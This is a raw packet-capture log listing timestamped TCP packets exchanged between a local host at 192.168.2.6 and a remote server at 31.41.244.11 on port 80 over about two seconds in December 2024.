                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.975862026 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.975883007 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.975928068 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.976593018 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.976640940 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.976676941 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.976716995 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.977562904 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.977610111 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.977637053 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.977683067 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.978377104 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.978424072 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.978472948 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.978517056 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.979211092 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.979259968 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.979330063 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.979379892 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.980082989 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.980133057 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.980289936 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.980336905 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.980967999 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.981071949 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.981101990 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.981112957 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.981823921 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.981877089 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.981888056 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.981930971 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.982671022 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.982718945 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.982748985 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.982795000 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.983575106 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.983623028 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.983704090 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.983751059 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.984482050 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.984519005 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.984529972 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.984556913 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.985295057 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.985340118 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.985362053 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.985403061 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.986207962 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.986258984 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.986339092 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.986382961 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.987041950 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.987088919 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.987152100 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.987195969 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.987865925 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.987914085 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.987946987 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.987992048 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.988770962 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.988817930 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.988887072 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.988928080 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.989626884 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.989675999 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.989707947 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.989753008 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.990583897 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.990629911 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.990679979 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.990722895 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.991367102 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.991413116 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.991568089 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.991611004 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.992214918 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.992279053 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.992305994 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.992348909 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.993088007 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.993136883 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.993212938 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.993252993 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.994030952 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.994071960 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.994154930 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.994200945 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.994843960 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.994884014 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.994888067 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.994926929 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.995667934 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.995712996 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.995738983 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.995784998 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.996526003 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.996572018 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.996654034 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.996692896 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.997458935 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.997509956 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.997519970 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.997565985 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.998307943 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.998353958 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.998424053 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.998471975 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.999211073 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.999255896 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.999285936 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:17.999335051 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.000097990 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.000144958 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.000206947 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.000248909 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.000963926 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.001008987 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.001019001 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.001055002 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.001806021 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.001859903 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.001914978 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.001959085 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.002650023 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.002710104 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.002768040 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.002818108 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.003521919 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.003570080 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.003587961 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.003633976 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.004352093 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.004400969 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.004429102 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.004472971 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.005255938 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.005301952 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.005402088 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.005449057 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.006151915 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.006196976 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.006279945 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.006325006 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.007093906 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.007144928 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.007203102 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.007239103 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.007910967 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.007934093 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.007955074 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.007976055 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.009637117 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.009681940 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.009707928 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.009718895 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.009759903 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.009898901 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.009943962 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.010730982 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.010776997 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.010802031 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.010849953 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.011320114 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.011368036 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.011369944 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.011413097 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.012209892 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.012301922 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.012357950 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.012398958 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.013115883 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.013175964 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.013251066 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.013290882 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.013936043 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.013982058 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.014008999 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.014049053 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.014827013 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.014877081 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.014959097 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.015011072 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.015702009 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.015753031 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.015768051 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.015801907 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.016547918 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.016597033 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.016676903 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.016726971 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.017636061 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.017678976 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.017786026 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.017828941 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.028415918 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.028470039 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165107965 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165170908 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165201902 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165210962 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165245056 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165246964 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165267944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165290117 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165630102 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165673971 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165704012 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.165749073 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.166484118 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.166533947 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.166541100 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.166589022 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.167423964 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.167465925 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.167546034 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.167594910 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.168232918 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.168283939 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.168319941 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.168364048 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.169089079 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.169137001 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.169146061 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.169190884 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.170034885 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.170078993 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.170110941 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.170156956 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.170865059 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.170908928 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.170922995 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.170967102 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.171714067 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.171756983 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.171828985 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.171869993 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.172578096 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.172621965 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.172656059 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.172697067 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.173558950 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.173607111 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.173764944 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.173814058 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.174417973 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.174463034 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.174498081 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.174547911 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.175215006 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.175256968 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.175286055 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.175329924 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.176026106 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.176076889 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.176155090 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.176202059 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.176903009 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.176949024 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.177007914 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.177054882 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.177782059 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.177794933 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.177834988 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.178687096 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.178736925 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.178761959 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.178808928 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.179503918 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.179558039 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.179625034 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.179673910 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.180471897 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.180521011 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.180536985 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.180586100 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.181248903 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:18.181299925 CET4987480192.168.2.631.41.244.11
